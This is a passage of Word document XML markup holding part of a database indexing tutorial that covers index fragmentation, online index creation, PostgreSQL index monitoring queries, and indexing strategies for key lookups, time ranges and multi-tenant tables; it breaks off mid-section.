    <w:p w14:paraId="3E22E3D0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Additional structures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A82B2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1470"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Doc values (columnar store):</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> For sorting, aggregations. Each field's values stored columnarly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC4C239" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1470"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BKD Trees:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> For numeric/geo range queries (points, ranges).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C038F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1470"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Term dictionaries (FST):</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Prefix-compressed mapping from terms to posting lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430172B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="16B9BF21">
          <v:rect id="_x0000_i5328" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="299ADABB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Index Maintenance and Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C60243" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 Index Fragmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B51A560" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Over time, inserts/updates/deletes leave gaps (deleted entries, half-full pages) in the index structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76420FF7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B6A7E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Fresh index page (90% full):    [key1][key2][key3]...[key180][        ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E1560A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>After many deletes (30% full):  [key1][    ][key3][    ]...[    ][key50]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAE978B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2DF8AE80" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Fragmented: more pages to read for same amount of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384B39D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> More I/O per query (reading partially-empty pages), larger index on disk, wasted buffer pool memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6E90A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7356E8BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1471"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL: REINDEX (rebuilds), VACUUM (reclaims dead space).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B9F22" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1471"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>MySQL: OPTIMIZE TABLE or ALTER TABLE ... ENGINE=InnoDB (rebuilds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C84BA95" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1471"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL Server: ALTER INDEX REBUILD or REORGANIZE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF6E129" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Online Index Creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C28C5A0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Creating an index on a large table (100M+ rows) can take minutes/hours. During creation, writes may be blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33325BE6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFC590D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1472"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL: CREATE INDEX CONCURRENTLY — doesn't lock the table, but takes longer (two passes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F1210A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1472"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>MySQL: Online DDL (InnoDB) — allows concurrent DML during index creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718D43E3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1472"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>MongoDB: Background index builds (default in 4.2+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537251B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it's slower but necessary for production:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B53224" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3951816B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Regular CREATE INDEX: Locks table → no writes for duration → fast (single pass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DEC6C2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CONCURRENTLY:        No lock → allows writes → must handle concurrent changes → slower (multiple passes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7BAEA2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 Index Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E7527F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key metrics to track:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F549D37" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2020F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- PostgreSQL: Index usage statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679DA9B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26842F8A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  indexrelname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3820901C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  idx_scan,          -- How many times this index was scanned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544546E1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  idx_tup_read,     -- Tuples read from index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BD153C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  idx_tup_fetch,    -- Tuples fetched from heap via index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E45D0F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  pg_size_pretty(pg_relation_size(indexrelid)) as index_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D3067C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FROM pg_stat_user_indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AC6FA1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ORDER BY idx_scan DESC;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F43503F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="346A7C25" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Index hit ratio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7429698F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C39625" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  sum(idx_blks_hit) / nullif(sum(idx_blks_hit + idx_blks_read), 0) as index_hit_ratio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31640BBE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FROM pg_statio_user_indexes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66234D11" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Target: &gt; 99% (index pages should be in memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7350653B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What to look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E488363" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1473"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Indexes with 0 scans: unused, pure write overhead → consider dropping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE57003" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1473"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Indexes with low hit ratio: too large for buffer pool → more RAM or smaller index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73071773" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1473"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Sequential scan ratio high on indexed table: optimizer isn't choosing the index → check statistics, query pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721B9A6C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="6EE607CA">
          <v:rect id="_x0000_i5329" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="280026FC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Indexing Strategies for Common Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E44DDE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Primary Key / Unique Lookups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598BF997" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F2FBAE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Automatically indexed (primary key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AE3CA5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM users WHERE id = 42;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C595824" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2A971A85" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Unique index for non-PK unique columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E13810" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE UNIQUE INDEX idx_email ON users(email);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383065D3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>SELECT * FROM users WHERE email = 'alice@example.com';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BF2958" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>O(log n) lookup. Simple, effective, always use for unique identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A1EFB5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Foreign Key Lookups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A75CB52" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0405D718" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Critical for JOIN performance and DELETE cascading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F196013" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx_order_customer ON orders(customer_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B87A71F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="5E233198" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Without this index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07326C30" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- SELECT * FROM orders WHERE customer_id = 42 → full table scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D2A5B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- DELETE FROM customers WHERE id = 42 → full scan of orders to check FK constraint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFEB262" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rule: Always index foreign keys.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Most databases don't create these automatically (PostgreSQL doesn't; MySQL InnoDB does for FK constraints).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780E44D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Time-Range Queries (Most Recent N)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567329B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B145462" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Common pattern: "Get the latest 20 orders for a customer"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F5F396" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SELECT * FROM orders WHERE customer_id = 42 ORDER BY created_at DESC LIMIT 20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778EC656" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3B5BD365" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Optimal index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC990CC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON orders(customer_id, created_at DESC);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC4CA68" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="7795F1FC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Execution: Seek to customer_id=42, scan backwards (DESC) through created_at, stop after 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E715AA4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- No sort needed (index is pre-sorted), very few rows read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF166C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.4 Multi-Tenant Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FC2D0F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15599429" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Every query includes tenant_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2895982D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>SELECT * FROM documents WHERE tenant_id = 'acme' AND type = 'invoice' AND created_at &gt; '2024-01-01';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFBC16E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="0E384C97" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Composite index with tenant_id FIRST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DEF61A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
